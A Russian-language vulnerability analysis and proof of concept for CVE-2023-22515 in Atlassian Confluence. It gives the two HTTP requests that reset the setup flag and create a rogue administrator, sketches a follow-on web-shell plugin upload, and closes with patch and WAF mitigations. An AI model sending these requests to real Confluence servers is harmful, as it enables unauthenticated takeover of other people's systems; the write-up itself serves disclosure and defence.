
Технический анализ и эксплойт-доказательство концепции для CVE-2023-22515, критической уязвимости нарушенного контроля доступа в Atlassian Confluence, позволяющей неаутентифицированное создание учетной записи администратора и компрометацию системы.
[!IMPORTANT] Срочное предупреждение безопасности: эта уязвимость имеет максимальный уровень опасности — 10.0 (Critical) по шкале CVSS. Если вы используете затронутые версии, требуется немедленное применение патча.
CVE-2023-22515 — критическая уязвимость нарушения контроля доступа (Broken Access Control), обнаруженная в Atlassian Confluence Data Center и Server. Злоумышленник может удалённо, без аутентификации, манипулировать конфигурацией сервера, создавать учётные записи администратора и полностью захватывать систему.
| Пункт | Подробности |
|---|
| Идентификатор уязвимости | CVE-2023-22515 |
| Уровень опасности | CRITICAL (CVSS 10.0) |
| Затронутые версии | 8.0.0 ~ 8.5.1 (требуется уточнение) |
| Тип атаки | Обход аутентификации и повышение привилегий |
Эта уязвимость срабатывает, когда злоумышленник через эндпоинт /server-info.action изменяет значение bootstrapStatusProvider.applicationConfig.setupComplete на false.
sequenceDiagram
participant Attacker as 😈 공격자
participant Server as 🖥️ Confluence 서버
participant Config as ⚙️ 설정 관리자
Note over Attacker, Server: 1단계: 설정 상태 초기화 공격
Attacker->>Server: GET /server-info.action?setupComplete=false
Server->>Config: 메모리 상의 설정 완료 플래그 해제
Config-->>Server: 상태 변경 완료 (설치 모드로 전환)
Server-->>Attacker: HTTP 200/302 OK
Note over Attacker, Server: 2단계: 관리자 계정 생성
Attacker->>Server: POST /setup/setupadministrator.action<br/>(새로운 관리자 정보 전송)
Server->>Server: 보안 검증 우회 (설치 모드라 허용됨)
Server-->>Attacker: 계정 생성 성공 및 로그인
Note over Attacker, Server: 3단계: 시스템 장악 (RCE)
Attacker->>Server: 악성 플러그인 업로드 (Web Shell)
Server-->>Attacker: 원격 명령 실행 권한 획득[!NOTE] Ключевой принцип: изменяется не постоянный файл конфигурации (
confluence.cfg.xml), а состояние во время выполнения в памяти, что позволяет обойти логику контроля доступа.
Уязвимость возникла из-за недостатка проверки внешнего ввода в параметрах привязки фреймворка XWork2 и в классе действия Confluence (ServerInfoAction) для чувствительного атрибута setupComplete.
Злоумышленник может обезвредить сервер простым HTTP-запросом.
1. Запрос на сброс конфигурации:
GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1
Host: target-confluence.com
2. Запрос на создание администратора:
POST /setup/setupadministrator.action HTTP/1.1
...
username=hacker_admin&password=P@ssw0rd123...
С помощью репродукционного набора (cve-2023-22515-repro), поставляемого вместе с этим отчётом, вы можете отработать уязвимость в безопасной среде Docker.
В комплект входит демонстрационный скрипт, позволяющий визуально наблюдать процесс реального взлома в терминале.
# Команда для запуска демонстрации
bash cinematic_pwn.sh
[!TIP] Демонстрационный скрипт автоматизирует полный процесс атаки на реальный сервер (
localhost:8090): создание учётной записи администратора и попытку входа в систему.
Наиболее надёжное решение — обновление до исправленных версий от Atlassian.
Если установка патча невозможна, заблокируйте доступ к следующим URL-шаблонам на сетевых средствах защиты (WAF, балансировщик нагрузки и т.п.):
*/setup/*CVE-2023-22515 — критическая уязвимость с очень низкой сложностью эксплуатации, позволяющая полностью захватить систему. Специалисты по безопасности должны немедленно установить патч и отслеживать возможные признаки компрометации.
Дата составления: 2026-01-16 | Автор: Antigravity Security Analysis Team